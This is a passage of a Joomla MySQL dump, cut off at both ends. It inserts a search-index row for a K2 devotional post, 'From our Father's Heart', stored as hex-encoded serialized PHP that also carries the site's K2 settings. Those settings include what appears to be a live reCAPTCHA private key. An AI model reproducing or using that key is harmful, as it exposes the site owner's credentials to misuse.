13a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30322d30352032313a33393a3239223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30322d30352032313a33393a3239223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(241, 'index.php?option=com_k2&view=item&id=23', 'index.php?option=com_k2&view=item&id=23:from-our-father-s-heart-12-02-2017', 'From our Father\'s Heart (12/02/2017)', ' Dearly Beloved, Life has two sides, the practical side and the prophetic side, and you must work the two very well in these days we are stepping into. When you get into a zone and it looks like there is destruction ahead, you will need to take heed to the prophetic at that moment. Handling these two sides of life will help us to know the difference between the different situations and what to do at such instances. ', '2017-06-25 14:18:27', 'fec521af786216249762eae4a5cdbe28', 1, 1, 1, '*', '2017-02-12 07:37:40', '0000-00-00 00:00:00', '2017-02-12 07:37:40', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223233223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d31322d30322d32303137223b733a373a2273756d6d617279223b733a3438343a223c703e446561726c792042656c6f7665642c3c2f703e0d0a3c703e4c696665206861732074776f2073696465732c2074686520c2a070726163746963616c20c2a07369646520c2a0616e6420c2a074686520c2a070726f70686574696320736964652c20616e6420c2a0796f75206d75737420c2a0776f726b20c2a074686520c2a074776f20c2a07665727920c2a077656c6c20c2a0696e20746865736520c2a06461797320776520617265207374657070696e6720696e746f2e205768656e20796f752067657420696e746f2061207a6f6e6520616e64206974206c6f6f6b73206c696b65207468657265206973206465737472756374696f6e20c2a02061686561642c20796f752077696c6c206e65656420746f2074616b65206865656420746f207468652070726f70686574696320c2a06174207468617420c2a06d6f6d656e742e20c2a048616e646c696e6720c2a0746865736520c2a074776f20736964657320c2a06f66206c6966652077696c6c2068656c7020c2a0757320746f206b6e6f772074686520646966666572656e6365206265747765656e20c2a074686520646966666572656e7420c2a0736974756174696f6e7320c2a020616e64207768617420746f20646f206174207375636820696e7374616e6365732e3c2f703e0d0a223b733a343a22626f6479223b733a333135303a220d0a3c703e49736169616820c2a02036303a313920c2a0207361797320727420c2a0205468652073756e207368616c6c206265206e6f206d6f726520746879206c69676874206279206461793b206e65697468657220666f72206272696768746e65737320c2a07368616c6c20746865206d6f6f6e2067697665206c6967687420756e746f20746865653a2062757420746865204c6f7264207368616c6c20c2a0626520756e746f20c2a07468656520616e20657665726c617374696e6720c2a06c696768742c20c2a0616e642074687920c2a0476f6420c2a074687920676c6f72792e22446f20796f75206b6e6f77207768617420476f6420697320736179696e6720686572653f205468617420697320612070726f7068656379207468617420c2a0612074696d652077696c6c20636f6d6520c2a0746861742077686174207573656420746f20776f726b206e6f726d616c6c792077696c6c206e6f206c6f6e67657220c2a0776f726b2e20546869732069732074616c6b696e6720c2a06f66207468652074696d65207768656e2077686174206973206e6f726d616c20c2a0616e6420757375616c20c2a063616e277420c2a066616365207768617420c2a0796f752061726520c2a0666163696e672e20417420737563682074696d65732c20c2a06d656e20c2a06172652073657061726174656420c2a066726f6d206d656e3a20c2a0736f6d652077696c6c20676f20756e6465722c20616e6420736f6d652077696c6c20676f206f7665722e204974206973206d79206465636c61726174696f6e20c2a07468617420796f752077696c6c206e6f7420626520616d6f6e672074686f736520746861742077696c6c20676f20756e6465722c2062757420796f752077696c6c20676f206f7665722e3c2f703e0d0a3c703e5768656e207468652049737261656c6974657320c2a0207765726520696e2045677970742c20c2a0746865726520776173206461726b6e65737320c2a0696e20456779707420627574206c6967687420696e20476f7368656e2e20c2a0416c6c20746865206576696c20746f756368696e672074686520456779707469616e732077657265206e6f7420746f756368696e6720c2a07468656d2e20c2a0536f20616e7920456779707469616e207468617420776173207769736520776f756c6420636f6d6520746f207468652049737261656c6974657320c2a020666f722068656c702e20c2a0416e6420476f6420697320736179696e672074686973206973207468652074696d6520c2a048652077616e747320746f20626567696e20746f20647261772074686520617474656e74696f6e20c2a06f662074686520776f726c6420746f2048697320c2a06368696c6472656e2e20c2a05768656e2043687269737469616e73206661696c20696e206c6966652c206974206973206e6f7420746865206e616d65206f66204a6573757320c2a074686174206661696c65643b206974207761732074686569722066616974682074686174206661696c65642e3c2f703e0d0a3c703e476f642077616e747320796f7520746f2074616b6520616c6f6e6720c2a07468697320796561722074686520574159204f462046414954482e20c2a0496620796f752074616b65207468697320c2a07761792c20796f75722073756e20776f6e277420c2a0676f20646f776e2e20c2a0497420736f756e647320736f2073696d706c6520c2a0696e207465616368696e6720627574206974206973206e6f7420736f20696e2070726163746963652120c2a020496620796f752074616b652074686520776179206f662066616974682c20796f752063616e206f6e6c7920676f2075702e20c2a0476f642077696c6c206f6e6c79206d65657420796f752061742074686520706f696e74206f6620796f75722066616974682e204661697468206973207468652063757272656e637920c2a06f6620746865206b696e67646f6d2e20c2a041742074686520656e64206f6620666169746820697320616c7761797320c2a0736f6d656f6e6520c2a02063616c6c656420c2a0476f642c20c2a0616e6420c2a0617420c2a074686520c2a0656e6420c2a06f66206665617220c2a0697320c2a0616c736f20736f6d656f6e6520c2a063616c6c656420736174616e2e20c2a0496620796f75206861766520666561722c20646f6e27742073746570206f75742c206f74686572776973652074686520646576696c20c2a0697320c2a0676f696e6720746f206d65737320796f75207570206261642120c2a0446f6e277420c2a073746570206f757420c2a0696e20c2a0666561722070726574656e64696e6720c2a0746f20626520696e2066616974682e2054686572652077696c6c20626520612074696d6520c2a0476f642077696c6c206769766520796f7520616e206f70706f7274756e69747920c2a0746f206465636c61726520796f75722066616974682e20c2a04920c2a068617665206e6f7420636f6d6520746f2061736b20796f7520746f20646f20736f6d657468696e6720c2a07374757069642062757420746f2074656c6c20796f7520746865206b6579207468617420476f6420697320676976696e6720757320666f722074686520646179732061686561642e20446f6e277420c2a074727920746f207072657061726520c2a0616e6f7468657220c2a0706572736f6e277320666169746820c2a062757420796f7572206f776e2066616974682c20c2a0646f6e277474727920c2a020746f206465636c61726520616e6f7468657220c2a0706572736f6e27732066616974682062757420796f7572206f776e2066616974682e20c2a0596f757220666169746820c2a06b6e6f77732065786163746c7920c2a07768617420796f752063616e206465616c20c2a077697468206e6f772e20596f757220666169746820c2a064657465726d696e657320c2a02074686520646567726565206f66207468652073757065726e61747572616c20c2a020657870657269656e63657320c2a0796f7520686176652e205768617420697320c2a064656c6179696e6720c2a0796f75206973206e6f742074686520646576696c2c20697420697320796f75722066616974682e3c2f703e0d0a3c703e4d6f7374206f6620796f7520617265207573656420746f2073616c61727920c2a0616e6420776520656e746572696e6720c2a0696e746f2074686520646179732074686174207468652073756e2077696c6c206e6f206d6f726520626520796f7572206c69676874206279206461792e20576861746576657220c2a0476f6420676976657320796f752c20796f752077696c6c2074616b65206974206669727374206279206661697468206265666f726520796f752074616b6520697420627920636173682e20596f752077696c6c20646f20796f7572206e61747572616c20c2a0776f726b2c2062757420776861742069732074686520666f7263652074686174206973206261636b696e6720616e6420737570706f7274696e6720c2a0796f753f204a757374206f6e652064617920746861742066656172206164647320746f20796f75722074696d652063616e2061646420236c4f6d696c6c696f6e20c2a0746f20796f757220636f73742e20c2a04d616e792070656f706c65206172652073656e64696e6720c2a0746865697220c2a06368696c6472656e20c2a0746f2061207363686f6f6c20c2a06c657373657220c2a07468616e20c2a07768617420c2a0746865792061637475616c6c7920c2a064657369726520c2a062656361757365206f666c61636b206f662066616974682e3c2f703e0d0a3c703e596f752063616e6e6f742074616b6520616e797468696e6720c2a07468617420476f6420676976657320796f7520696620796f7520646f6e277420c2a074616b652069742062792066616974682c20686f77206c6f6e672077696c6c20796f75206b65657020706f7374706f6e696e673f20c2a05768656e2061726520796f7520676f696e6720746f2074616b652061206465636973696f6e20616e64207361792c20224c6f72642c204920c2a077696c6c2074616b65206974206e6f77223f20576861742063616e20796f75722066616974682074616b653f54686174697320c2a0776865726520796f752077696c6c2066696e6420476f64213c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f6427732053657276616e743c2f703e0d0a3c703e5265762e204f6c75736f6c6120c2a04172656f67756e2e3c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30322d31392031393a30393a3138223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223131223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2232333a66726f6d2d6f75722d6661746865722d732d68656172742d31322d30322d32303137223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f32332d66726f6d2d6f75722d6661746865722d732d68656172742d31322d30322d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3233223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f